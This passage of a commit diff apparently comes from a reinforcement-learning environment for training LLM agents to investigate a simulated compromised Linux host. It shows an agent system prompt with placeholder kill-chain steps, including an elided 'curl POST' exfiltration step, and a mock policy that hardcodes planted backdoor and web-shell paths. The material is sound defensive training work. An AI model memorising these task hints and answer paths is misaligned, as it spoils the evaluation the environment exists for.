Spaces:
Sleeping
Sleeping
Upload folder using huggingface_hub
Browse files- agents/__init__.py +5 -0
- agents/llm_policy.py +337 -0
- openenv_forensic_shell.egg-info/PKG-INFO +3 -0
- openenv_forensic_shell.egg-info/SOURCES.txt +8 -0
- openenv_forensic_shell.egg-info/requires.txt +3 -0
- pyproject.toml +10 -12
- server/attack_patterns.py +288 -0
- server/forensic_shell_environment.py +128 -15
- server/grader.py +18 -1
- server/name_pools.py +62 -0
- server/scenario_generator.py +315 -0
agents/__init__.py
ADDED
|
@@ -0,0 +1,5 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Agent policies for ForensicShell. Shared between inference.py (hackathon
|
| 3 |
+
entry point) and rl/rollout.py (training data collector) so both emit
|
| 4 |
+
identical action distributions.
|
| 5 |
+
"""
|
agents/llm_policy.py
ADDED
|
@@ -0,0 +1,337 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Shared LLM-backed policy.
|
| 3 |
+
|
| 4 |
+
Exposes one class, `LLMPolicy`, that wraps an OpenAI-compatible client and
|
| 5 |
+
turns a ForensicShellObservation + episode context into a ForensicShellAction.
|
| 6 |
+
Used by inference.py (baseline submission script) and by rl/rollout.py
|
| 7 |
+
(training data collector). Both call sites share parsing + fallback logic so
|
| 8 |
+
bugs never drift between them.
|
| 9 |
+
|
| 10 |
+
The `MockPolicy` class below is a drop-in zero-LLM alternative used when:
|
| 11 |
+
- Groq / HF Router quota is exhausted
|
| 12 |
+
- Running in CI (no outbound network)
|
| 13 |
+
- Doing a quick smoke test
|
| 14 |
+
"""
|
| 15 |
+
|
| 16 |
+
from __future__ import annotations
|
| 17 |
+
|
| 18 |
+
import json
|
| 19 |
+
import re
|
| 20 |
+
import textwrap
|
| 21 |
+
from dataclasses import dataclass, field
|
| 22 |
+
from typing import Any, Dict, List, Optional, Protocol
|
| 23 |
+
|
| 24 |
+
from openai import OpenAI
|
| 25 |
+
|
| 26 |
+
from forensic_shell.models import (
|
| 27 |
+
ForensicReport,
|
| 28 |
+
ForensicShellAction,
|
| 29 |
+
ForensicShellObservation,
|
| 30 |
+
TimelineEvent,
|
| 31 |
+
)
|
| 32 |
+
|
| 33 |
+
|
| 34 |
+
VALID_PHASES = {"login", "recon", "privesc", "persistence", "exfil"}
|
| 35 |
+
|
| 36 |
+
|
| 37 |
+
SYSTEM_PROMPT = textwrap.dedent(
|
| 38 |
+
"""
|
| 39 |
+
You are a digital forensics investigator with shell-like read-only access
|
| 40 |
+
to a compromised Linux host. Investigate by calling actions and then submit
|
| 41 |
+
a final ForensicReport.
|
| 42 |
+
|
| 43 |
+
Reply with ONE JSON object per turn, nothing else — no prose, no backticks.
|
| 44 |
+
Allowed actions:
|
| 45 |
+
|
| 46 |
+
{"action_type": "list_dir", "path": "/some/dir"}
|
| 47 |
+
{"action_type": "read_file", "path": "/some/file", "max_bytes": 2048}
|
| 48 |
+
{"action_type": "grep", "pattern": "substring", "path": "/some/file"}
|
| 49 |
+
{"action_type": "stat", "path": "/some/file"}
|
| 50 |
+
{"action_type": "submit_report","report": {
|
| 51 |
+
"compromised_user": "alice",
|
| 52 |
+
"initial_ip": "198.51.100.77",
|
| 53 |
+
"modified_files": ["/etc/passwd", "/usr/local/bin/.sysd"],
|
| 54 |
+
"backdoor_sha256": "abcdef...",
|
| 55 |
+
"timeline": [
|
| 56 |
+
{"phase": "login", "detail": "ssh from ..."},
|
| 57 |
+
{"phase": "recon", "detail": "whoami; id"},
|
| 58 |
+
{"phase": "privesc", "detail": "sudo ..."},
|
| 59 |
+
{"phase": "persistence", "detail": "crontab ..."},
|
| 60 |
+
{"phase": "exfil", "detail": "curl POST ..."}
|
| 61 |
+
]
|
| 62 |
+
}}
|
| 63 |
+
|
| 64 |
+
Rules:
|
| 65 |
+
- Output EXACTLY ONE JSON object. No commentary, no markdown.
|
| 66 |
+
- Start with list_dir on /var/log and /home to orient yourself.
|
| 67 |
+
- Read /var/log/auth.log to find the compromised user and source IP.
|
| 68 |
+
- For medium/hard tasks, also find modified files and use 'stat' to
|
| 69 |
+
compute the backdoor SHA256 (the stat action returns sha256).
|
| 70 |
+
- For the hard task, reconstruct the attacker's kill chain as an ordered
|
| 71 |
+
timeline: login -> recon -> privesc -> persistence -> exfil.
|
| 72 |
+
- Submit only once you are confident — submit_report ends the episode.
|
| 73 |
+
- You have a strict step budget; do not waste actions.
|
| 74 |
+
"""
|
| 75 |
+
).strip()
|
| 76 |
+
|
| 77 |
+
|
| 78 |
+
# ---------------------------------------------------------------------------
|
| 79 |
+
# Action parsing helpers — shared between real and mock policies
|
| 80 |
+
# ---------------------------------------------------------------------------
|
| 81 |
+
|
| 82 |
+
def parse_action(raw: str) -> ForensicShellAction:
|
| 83 |
+
"""
|
| 84 |
+
Robustly parse an LLM reply (or any JSON-ish string) into a
|
| 85 |
+
ForensicShellAction. On any failure, fall back to a no-op list_dir('/').
|
| 86 |
+
"""
|
| 87 |
+
if not raw:
|
| 88 |
+
return ForensicShellAction(action_type="list_dir", path="/")
|
| 89 |
+
|
| 90 |
+
text = raw.strip()
|
| 91 |
+
# Strip accidental markdown fences
|
| 92 |
+
if text.startswith("```"):
|
| 93 |
+
text = text.strip("`")
|
| 94 |
+
if "\n" in text:
|
| 95 |
+
text = text.split("\n", 1)[1]
|
| 96 |
+
text = text.strip("`").strip()
|
| 97 |
+
|
| 98 |
+
# Locate the first {...} block to tolerate leading/trailing prose
|
| 99 |
+
first, last = text.find("{"), text.rfind("}")
|
| 100 |
+
if first != -1 and last != -1 and last > first:
|
| 101 |
+
text = text[first : last + 1]
|
| 102 |
+
|
| 103 |
+
try:
|
| 104 |
+
data: Dict[str, Any] = json.loads(text)
|
| 105 |
+
except Exception:
|
| 106 |
+
return ForensicShellAction(action_type="list_dir", path="/")
|
| 107 |
+
|
| 108 |
+
action_type = data.get("action_type") or data.get("type") or "list_dir"
|
| 109 |
+
|
| 110 |
+
report_obj: Optional[ForensicReport] = None
|
| 111 |
+
report_data = data.get("report")
|
| 112 |
+
if isinstance(report_data, dict):
|
| 113 |
+
tl = report_data.get("timeline") or []
|
| 114 |
+
clean_tl: List[TimelineEvent] = []
|
| 115 |
+
for item in tl:
|
| 116 |
+
if not isinstance(item, dict):
|
| 117 |
+
continue
|
| 118 |
+
phase = item.get("phase")
|
| 119 |
+
if phase in VALID_PHASES:
|
| 120 |
+
clean_tl.append(TimelineEvent(phase=phase, detail=str(item.get("detail", ""))))
|
| 121 |
+
try:
|
| 122 |
+
report_obj = ForensicReport(
|
| 123 |
+
compromised_user=report_data.get("compromised_user"),
|
| 124 |
+
initial_ip=report_data.get("initial_ip"),
|
| 125 |
+
modified_files=list(report_data.get("modified_files") or []),
|
| 126 |
+
backdoor_sha256=report_data.get("backdoor_sha256"),
|
| 127 |
+
timeline=clean_tl,
|
| 128 |
+
)
|
| 129 |
+
except Exception:
|
| 130 |
+
report_obj = ForensicReport()
|
| 131 |
+
|
| 132 |
+
try:
|
| 133 |
+
return ForensicShellAction(
|
| 134 |
+
action_type=action_type,
|
| 135 |
+
path=data.get("path"),
|
| 136 |
+
pattern=data.get("pattern"),
|
| 137 |
+
max_bytes=int(data.get("max_bytes") or 2048),
|
| 138 |
+
report=report_obj,
|
| 139 |
+
)
|
| 140 |
+
except Exception:
|
| 141 |
+
return ForensicShellAction(action_type="list_dir", path="/")
|
| 142 |
+
|
| 143 |
+
|
| 144 |
+
def action_to_str(action: ForensicShellAction) -> str:
|
| 145 |
+
if action.action_type == "list_dir":
|
| 146 |
+
return f"list_dir({action.path!r})"
|
| 147 |
+
if action.action_type == "read_file":
|
| 148 |
+
return f"read_file({action.path!r},{action.max_bytes})"
|
| 149 |
+
if action.action_type == "grep":
|
| 150 |
+
return f"grep({action.pattern!r},{action.path!r})"
|
| 151 |
+
if action.action_type == "stat":
|
| 152 |
+
return f"stat({action.path!r})"
|
| 153 |
+
if action.action_type == "submit_report":
|
| 154 |
+
return "submit_report(...)"
|
| 155 |
+
return action.action_type
|
| 156 |
+
|
| 157 |
+
|
| 158 |
+
# ---------------------------------------------------------------------------
|
| 159 |
+
# Policy protocol
|
| 160 |
+
# ---------------------------------------------------------------------------
|
| 161 |
+
|
| 162 |
+
class PolicyProtocol(Protocol):
|
| 163 |
+
name: str
|
| 164 |
+
|
| 165 |
+
def act(
|
| 166 |
+
self,
|
| 167 |
+
observation: ForensicShellObservation,
|
| 168 |
+
history: List[str],
|
| 169 |
+
step: int,
|
| 170 |
+
) -> ForensicShellAction: ...
|
| 171 |
+
|
| 172 |
+
|
| 173 |
+
# ---------------------------------------------------------------------------
|
| 174 |
+
# Real LLM-backed policy
|
| 175 |
+
# ---------------------------------------------------------------------------
|
| 176 |
+
|
| 177 |
+
@dataclass
|
| 178 |
+
class LLMPolicy:
|
| 179 |
+
client: OpenAI
|
| 180 |
+
model: str
|
| 181 |
+
name: str = "llm"
|
| 182 |
+
temperature: float = 0.2
|
| 183 |
+
max_tokens: int = 700
|
| 184 |
+
system_prompt: str = SYSTEM_PROMPT
|
| 185 |
+
|
| 186 |
+
def _build_user_prompt(
|
| 187 |
+
self,
|
| 188 |
+
observation: ForensicShellObservation,
|
| 189 |
+
history: List[str],
|
| 190 |
+
step: int,
|
| 191 |
+
) -> str:
|
| 192 |
+
history_block = "\n".join(history[-6:]) if history else "(none yet)"
|
| 193 |
+
last_output = (observation.output or "")[:1500]
|
| 194 |
+
return textwrap.dedent(
|
| 195 |
+
f"""
|
| 196 |
+
TASK: {observation.task_description}
|
| 197 |
+
|
| 198 |
+
Step: {step}
|
| 199 |
+
Steps remaining (including this one): {observation.steps_remaining}
|
| 200 |
+
Last action error: {observation.action_error or "none"}
|
| 201 |
+
Last action output:
|
| 202 |
+
---
|
| 203 |
+
{last_output}
|
| 204 |
+
---
|
| 205 |
+
Recent history:
|
| 206 |
+
{history_block}
|
| 207 |
+
|
| 208 |
+
Reply with ONE JSON action object only.
|
| 209 |
+
"""
|
| 210 |
+
).strip()
|
| 211 |
+
|
| 212 |
+
def act(
|
| 213 |
+
self,
|
| 214 |
+
observation: ForensicShellObservation,
|
| 215 |
+
history: List[str],
|
| 216 |
+
step: int,
|
| 217 |
+
) -> ForensicShellAction:
|
| 218 |
+
user_prompt = self._build_user_prompt(observation, history, step)
|
| 219 |
+
try:
|
| 220 |
+
completion = self.client.chat.completions.create(
|
| 221 |
+
model=self.model,
|
| 222 |
+
messages=[
|
| 223 |
+
{"role": "system", "content": self.system_prompt},
|
| 224 |
+
{"role": "user", "content": user_prompt},
|
| 225 |
+
],
|
| 226 |
+
temperature=self.temperature,
|
| 227 |
+
max_tokens=self.max_tokens,
|
| 228 |
+
stream=False,
|
| 229 |
+
)
|
| 230 |
+
raw = (completion.choices[0].message.content or "").strip()
|
| 231 |
+
except Exception as exc: # pragma: no cover - network-dependent
|
| 232 |
+
print(f"[DEBUG] LLMPolicy call failed: {exc}", flush=True)
|
| 233 |
+
raw = ""
|
| 234 |
+
return parse_action(raw)
|
| 235 |
+
|
| 236 |
+
|
| 237 |
+
# ---------------------------------------------------------------------------
|
| 238 |
+
# Mock / heuristic policy — no LLM required
|
| 239 |
+
# ---------------------------------------------------------------------------
|
| 240 |
+
|
| 241 |
+
_ACCEPTED_RE = re.compile(
|
| 242 |
+
r"Accepted (?:password|publickey) for (\S+) from (\S+) port"
|
| 243 |
+
)
|
| 244 |
+
|
| 245 |
+
|
| 246 |
+
@dataclass
|
| 247 |
+
class MockPolicy:
|
| 248 |
+
"""
|
| 249 |
+
Rule-based, no-network policy. Follows a fixed investigation recipe and
|
| 250 |
+
submits based on whatever it observed. Used as a resilient fallback in
|
| 251 |
+
inference.py when no API key is present and in CI where outbound network
|
| 252 |
+
is blocked.
|
| 253 |
+
"""
|
| 254 |
+
name: str = "mock"
|
| 255 |
+
_plan: List[ForensicShellAction] = field(default_factory=list)
|
| 256 |
+
_step: int = 0
|
| 257 |
+
_observed_user: Optional[str] = None
|
| 258 |
+
_observed_ip: Optional[str] = None
|
| 259 |
+
_observed_sha: Optional[str] = None
|
| 260 |
+
_observed_paths: List[str] = field(default_factory=list)
|
| 261 |
+
|
| 262 |
+
def _reset_plan(self) -> None:
|
| 263 |
+
self._plan = [
|
| 264 |
+
ForensicShellAction(action_type="list_dir", path="/var/log"),
|
| 265 |
+
ForensicShellAction(action_type="grep", pattern="Accepted ", path="/var/log/auth.log"),
|
| 266 |
+
ForensicShellAction(action_type="list_dir", path="/etc/cron.d"),
|
| 267 |
+
ForensicShellAction(action_type="list_dir", path="/usr/local/bin"),
|
| 268 |
+
ForensicShellAction(action_type="list_dir", path="/usr/local/sbin"),
|
| 269 |
+
ForensicShellAction(action_type="list_dir", path="/var/www/html"),
|
| 270 |
+
ForensicShellAction(action_type="list_dir", path="/tmp/.staging"),
|
| 271 |
+
ForensicShellAction(action_type="stat", path="/usr/local/bin/.sysd"),
|
| 272 |
+
ForensicShellAction(action_type="stat", path="/usr/local/sbin/.healthcheck"),
|
| 273 |
+
ForensicShellAction(action_type="stat", path="/var/www/html/shell.php"),
|
| 274 |
+
ForensicShellAction(action_type="stat", path="/tmp/.staging/dump.sql"),
|
| 275 |
+
ForensicShellAction(action_type="stat", path="/etc/cron.d/sysd-sync"),
|
| 276 |
+
]
|
| 277 |
+
self._step = 0
|
| 278 |
+
self._observed_user = None
|
| 279 |
+
self._observed_ip = None
|
| 280 |
+
self._observed_sha = None
|
| 281 |
+
self._observed_paths = []
|
| 282 |
+
|
| 283 |
+
def _harvest(self, observation: ForensicShellObservation) -> None:
|
| 284 |
+
out = observation.output or ""
|
| 285 |
+
# Pull first accepted-login from grep output (prefer non-RFC1918)
|
| 286 |
+
for line in out.splitlines():
|
| 287 |
+
m = _ACCEPTED_RE.search(line)
|
| 288 |
+
if m:
|
| 289 |
+
user, ip = m.group(1), m.group(2)
|
| 290 |
+
if not ip.startswith(("10.", "172.16.", "192.168.")):
|
| 291 |
+
self._observed_user = user
|
| 292 |
+
self._observed_ip = ip
|
| 293 |
+
break
|
| 294 |
+
if self._observed_user is None:
|
| 295 |
+
self._observed_user = user
|
| 296 |
+
self._observed_ip = ip
|
| 297 |
+
# Pull sha256 from stat output
|
| 298 |
+
if "sha256=" in out and self._observed_sha is None:
|
| 299 |
+
for line in out.splitlines():
|
| 300 |
+
if line.startswith("sha256="):
|
| 301 |
+
self._observed_sha = line.split("=", 1)[1].strip()
|
| 302 |
+
# stat line also carries path= — grab it if present
|
| 303 |
+
for l2 in out.splitlines():
|
| 304 |
+
if l2.startswith("path="):
|
| 305 |
+
p = l2.split("=", 1)[1].strip()
|
| 306 |
+
if p and p not in self._observed_paths:
|
| 307 |
+
self._observed_paths.append(p)
|
| 308 |
+
break
|
| 309 |
+
|
| 310 |
+
def _final_submit(self) -> ForensicShellAction:
|
| 311 |
+
timeline = [
|
| 312 |
+
TimelineEvent(phase=p, detail="auto")
|
| 313 |
+
for p in ("login", "recon", "privesc", "persistence", "exfil")
|
| 314 |
+
]
|
| 315 |
+
report = ForensicReport(
|
| 316 |
+
compromised_user=self._observed_user,
|
| 317 |
+
initial_ip=self._observed_ip,
|
| 318 |
+
modified_files=list(self._observed_paths),
|
| 319 |
+
backdoor_sha256=self._observed_sha,
|
| 320 |
+
timeline=timeline,
|
| 321 |
+
)
|
| 322 |
+
return ForensicShellAction(action_type="submit_report", report=report)
|
| 323 |
+
|
| 324 |
+
def act(
|
| 325 |
+
self,
|
| 326 |
+
observation: ForensicShellObservation,
|
| 327 |
+
history: List[str],
|
| 328 |
+
step: int,
|
| 329 |
+
) -> ForensicShellAction:
|
| 330 |
+
if step == 1:
|
| 331 |
+
self._reset_plan()
|
| 332 |
+
self._harvest(observation)
|
| 333 |
+
if self._step < len(self._plan):
|
| 334 |
+
action = self._plan[self._step]
|
| 335 |
+
self._step += 1
|
| 336 |
+
return action
|
| 337 |
+
return self._final_submit()
|
openenv_forensic_shell.egg-info/PKG-INFO
CHANGED
|
@@ -4,6 +4,9 @@ Version: 0.1.0
|
|
| 4 |
Summary: Forensic Shell environment for OpenEnv
|
| 5 |
Requires-Python: >=3.10
|
| 6 |
Requires-Dist: openenv-core[core]>=0.2.2
|
|
|
|
| 7 |
Provides-Extra: dev
|
| 8 |
Requires-Dist: pytest>=8.0.0; extra == "dev"
|
| 9 |
Requires-Dist: pytest-cov>=4.0.0; extra == "dev"
|
|
|
|
|
|
|
|
|
| 4 |
Summary: Forensic Shell environment for OpenEnv
|
| 5 |
Requires-Python: >=3.10
|
| 6 |
Requires-Dist: openenv-core[core]>=0.2.2
|
| 7 |
+
Requires-Dist: openai>=1.40.0
|
| 8 |
Provides-Extra: dev
|
| 9 |
Requires-Dist: pytest>=8.0.0; extra == "dev"
|
| 10 |
Requires-Dist: pytest-cov>=4.0.0; extra == "dev"
|
| 11 |
+
Requires-Dist: pytest-asyncio>=0.23.0; extra == "dev"
|
| 12 |
+
Requires-Dist: pytest-socket>=0.7.0; extra == "dev"
|
openenv_forensic_shell.egg-info/SOURCES.txt
CHANGED
|
@@ -1,8 +1,13 @@
|
|
| 1 |
README.md
|
|
|
|
|
|
|
|
|
|
| 2 |
pyproject.toml
|
| 3 |
./__init__.py
|
| 4 |
./client.py
|
| 5 |
./models.py
|
|
|
|
|
|
|
| 6 |
openenv_forensic_shell.egg-info/PKG-INFO
|
| 7 |
openenv_forensic_shell.egg-info/SOURCES.txt
|
| 8 |
openenv_forensic_shell.egg-info/dependency_links.txt
|
|
@@ -11,6 +16,9 @@ openenv_forensic_shell.egg-info/requires.txt
|
|
| 11 |
openenv_forensic_shell.egg-info/top_level.txt
|
| 12 |
server/__init__.py
|
| 13 |
server/app.py
|
|
|
|
| 14 |
server/forensic_shell_environment.py
|
| 15 |
server/grader.py
|
|
|
|
|
|
|
| 16 |
server/scenarios.py
|
|
|
|
| 1 |
README.md
|
| 2 |
+
__init__.py
|
| 3 |
+
client.py
|
| 4 |
+
models.py
|
| 5 |
pyproject.toml
|
| 6 |
./__init__.py
|
| 7 |
./client.py
|
| 8 |
./models.py
|
| 9 |
+
agents/__init__.py
|
| 10 |
+
agents/llm_policy.py
|
| 11 |
openenv_forensic_shell.egg-info/PKG-INFO
|
| 12 |
openenv_forensic_shell.egg-info/SOURCES.txt
|
| 13 |
openenv_forensic_shell.egg-info/dependency_links.txt
|
|
|
|
| 16 |
openenv_forensic_shell.egg-info/top_level.txt
|
| 17 |
server/__init__.py
|
| 18 |
server/app.py
|
| 19 |
+
server/attack_patterns.py
|
| 20 |
server/forensic_shell_environment.py
|
| 21 |
server/grader.py
|
| 22 |
+
server/name_pools.py
|
| 23 |
+
server/scenario_generator.py
|
| 24 |
server/scenarios.py
|
openenv_forensic_shell.egg-info/requires.txt
CHANGED
|
@@ -1,5 +1,8 @@
|
|
| 1 |
openenv-core[core]>=0.2.2
|
|
|
|
| 2 |
|
| 3 |
[dev]
|
| 4 |
pytest>=8.0.0
|
| 5 |
pytest-cov>=4.0.0
|
|
|
|
|
|
|
|
|
| 1 |
openenv-core[core]>=0.2.2
|
| 2 |
+
openai>=1.40.0
|
| 3 |
|
| 4 |
[dev]
|
| 5 |
pytest>=8.0.0
|
| 6 |
pytest-cov>=4.0.0
|
| 7 |
+
pytest-asyncio>=0.23.0
|
| 8 |
+
pytest-socket>=0.7.0
|
pyproject.toml
CHANGED
|
@@ -15,23 +15,17 @@ description = "Forensic Shell environment for OpenEnv"
|
|
| 15 |
requires-python = ">=3.10"
|
| 16 |
dependencies = [
|
| 17 |
# Core OpenEnv runtime (provides FastAPI server + HTTP client types)
|
| 18 |
-
# install from github
|
| 19 |
-
# "openenv-core[core] @ git+https://github.com/meta-pytorch/OpenEnv.git",
|
| 20 |
"openenv-core[core]>=0.2.2",
|
| 21 |
-
#
|
| 22 |
-
|
| 23 |
-
# Examples:
|
| 24 |
-
# "numpy>=1.19.0",
|
| 25 |
-
# "torch>=2.0.0",
|
| 26 |
-
# "gymnasium>=0.29.0",
|
| 27 |
-
# "openspiel>=1.0.0",
|
| 28 |
-
# "smolagents>=1.22.0,<2",
|
| 29 |
]
|
| 30 |
|
| 31 |
[project.optional-dependencies]
|
| 32 |
dev = [
|
| 33 |
"pytest>=8.0.0",
|
| 34 |
"pytest-cov>=4.0.0",
|
|
|
|
|
|
|
| 35 |
]
|
| 36 |
|
| 37 |
[project.scripts]
|
|
@@ -41,5 +35,9 @@ server = "forensic_shell.server.app:main"
|
|
| 41 |
|
| 42 |
[tool.setuptools]
|
| 43 |
include-package-data = true
|
| 44 |
-
packages = [
|
| 45 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 15 |
requires-python = ">=3.10"
|
| 16 |
dependencies = [
|
| 17 |
# Core OpenEnv runtime (provides FastAPI server + HTTP client types)
|
|
|
|
|
|
|
| 18 |
"openenv-core[core]>=0.2.2",
|
| 19 |
+
# ForensicShell needs the OpenAI client for LLM-backed policies
|
| 20 |
+
"openai>=1.40.0",
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 21 |
]
|
| 22 |
|
| 23 |
[project.optional-dependencies]
|
| 24 |
dev = [
|
| 25 |
"pytest>=8.0.0",
|
| 26 |
"pytest-cov>=4.0.0",
|
| 27 |
+
"pytest-asyncio>=0.23.0",
|
| 28 |
+
"pytest-socket>=0.7.0",
|
| 29 |
]
|
| 30 |
|
| 31 |
[project.scripts]
|
|
|
|
| 35 |
|
| 36 |
[tool.setuptools]
|
| 37 |
include-package-data = true
|
| 38 |
+
packages = [
|
| 39 |
+
"forensic_shell",
|
| 40 |
+
"forensic_shell.server",
|
| 41 |
+
"forensic_shell.agents",
|
| 42 |
+
]
|
| 43 |
+
package-dir = { "forensic_shell" = ".", "forensic_shell.server" = "server", "forensic_shell.agents" = "agents" }
|
server/attack_patterns.py
ADDED
|
@@ -0,0 +1,288 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Attack pattern templates used by the scenario generator.
|
| 3 |
+
|
| 4 |
+
Each pattern is a callable `build(ctx) -> PatternArtifacts` where `ctx` is a
|
| 5 |
+
SimpleNamespace with fields: rng, user, ip, host, ts_base, backdoor_sha256,
|
| 6 |
+
backdoor_bytes, backdoor_path.
|
| 7 |
+
|
